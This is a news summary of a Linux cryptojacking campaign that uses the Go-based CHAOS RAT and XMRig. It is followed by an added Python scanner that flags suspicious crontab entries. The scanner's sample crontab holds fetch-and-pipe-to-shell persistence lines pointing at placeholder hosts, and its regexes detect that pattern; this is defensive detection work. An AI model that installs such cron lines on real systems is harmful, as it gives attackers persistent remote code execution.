"Cryptocurrency Mining Campaign Hits Linux Users With Go-Based CHAOS Malware"

An open-source Remote Access Trojan (RAT) called CHAOS was used in a cryptocurrency mining attack against the Linux operating system. Trend Micro discovered the threat in November 2022; in all other aspects it has remained nearly the same, including terminating competing malware and security software and deploying the Monero (XMR) cryptocurrency miner. According to researchers David Fiser and Alfredo Oliveira, the malware achieves persistence by modifying a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin. This is followed by the download of next-stage payloads, which include the XMRig miner and the Go-based CHAOS RAT. According to the cybersecurity firm, the main downloader script and additional payloads are hosted in multiple locations to ensure that the campaign stays active and new infections continue. Once downloaded and launched, the CHAOS RAT sends detailed system metadata to a remote server. It has the ability to perform file operations, take screenshots, shut down and restart the computer, and open arbitrary URLs. This article continues to discuss the use of the Go-based CHAOS RAT in cryptocurrency mining attacks targeting Linux users.
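A defender can hunt for the persistence pattern described above by reviewing scheduled jobs for short-interval download-and-run entries. The following is an added example, not code from the article or from Trend Micro; it also treats `@reboot` jobs as a re-run indicator, which goes slightly beyond the 10-minute case in the text. It assumes the task scheduler is cron, and the crontab lines and host names are constructed placeholders.

```python
import re

# Constructed sample crontab (illustrative; not taken from the campaign).
SAMPLE_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL https://pastebin.example/raw/PLACEHOLDER | sh
*/5 * * * * root wget -q -O - http://mirror.example/x.sh | bash
*/15 * * * * /usr/bin/curl -s https://status.example/ping
@reboot /usr/bin/curl -s https://paste.example/raw/PLACEHOLDER | sh
"""

FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*\bhttps?://([^/\s'\"]+)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S+/)?(?:ba|da|z)?sh\b")
STEP = re.compile(r"^\*/(\d+)$")

def parse_entry(line):
    """Return (schedule, command) for a job line; None for blanks, comments, env vars."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
        return None
    if line.startswith("@"):                      # @reboot, @daily, ...
        name, _, cmd = line.partition(" ")
        return name, cmd.strip()
    parts = line.split(None, 5)                   # five time fields, then the command
    return (parts[0], parts[5]) if len(parts) == 6 else None

def assess(line, max_interval=10):
    """List reasons a job resembles download-and-run persistence."""
    entry = parse_entry(line)
    fetch = FETCH.search(entry[1]) if entry else None
    if not fetch:
        return []
    reasons = ["fetches from " + fetch.group(1).lower()]
    if PIPE_TO_SHELL.search(entry[1]):
        reasons.append("pipes download to a shell")
    step = STEP.match(entry[0])
    if entry[0] == "@reboot" or (step and int(step.group(1)) <= max_interval):
        reasons.append("re-runs frequently or at boot")
    return reasons

def scan(text):
    """Return {line: reasons} for jobs matching at least two indicators."""
    found = {line: assess(line) for line in text.splitlines()}
    return {line: r for line, r in found.items() if len(r) >= 2}

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_CRONTAB).items():
        print(line, "->", "; ".join(reasons))
```

Requiring two indicators keeps a plain health-check ping out of the results while still surfacing jobs that fetch a script and hand it straight to a shell.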

THN reports "Cryptocurrency Mining Campaign Hits Linux Users With Go-Based CHAOS Malware"

Submitted by Anonymous on